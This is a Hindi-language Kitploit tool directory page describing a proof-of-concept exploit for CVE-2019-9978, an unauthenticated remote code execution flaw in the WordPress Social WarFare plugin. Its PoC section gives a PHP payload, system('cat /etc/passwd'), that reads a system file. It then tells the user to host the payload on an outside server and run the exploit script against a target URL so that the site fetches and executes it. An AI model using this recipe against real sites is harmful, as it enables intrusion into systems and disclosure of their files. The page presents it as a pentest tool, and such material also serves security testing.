Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-9978 — CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2) | Kitploit
उपकरण/GitHubGitHub/hash3lizer/cve-2019-9978
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubhash3lizer/cve-2019-9978

CVE-2019-9978

CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2)

रिपॉजिटरी देखें
2287 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-9978

CVE-2019-9978 - (PoC) Social WarFare Plugin में RCE (<=3.5.2)

विवरण

सेटिंग्स आयात को संभालने वाली कार्यक्षमता में बिना प्रमाणीकरण के रिमोट कोड निष्पादन की खोज की गई है। एक उपयोगकर्ता RFI का उपयोग करके RCE तक पहुँच सकता है।

PoC

निम्न पेलोड कॉपी करें:

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

इसे payload.txt फ़ाइल नाम से सहेजें और एक सर्वर पर अपलोड करें। URI इस प्रकार दिखना चाहिए: http(s)://yoursite.com/payload.txt। अंत में, अपने --target और --payload-uri विकल्प प्रदान करें:

root@kitploit:~
$ python cve-2019-9978.py --target http://vulntarget.com \
                         --payload-uri http://yourpayloadsite.com/payload.txt

Screenshot at 2019-05-03 11-15-02

श्रेय

शोधकर्ता: Luka Sikic
लिंक: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
लेखक: @hash3liZer

टूल डाउनलोड करें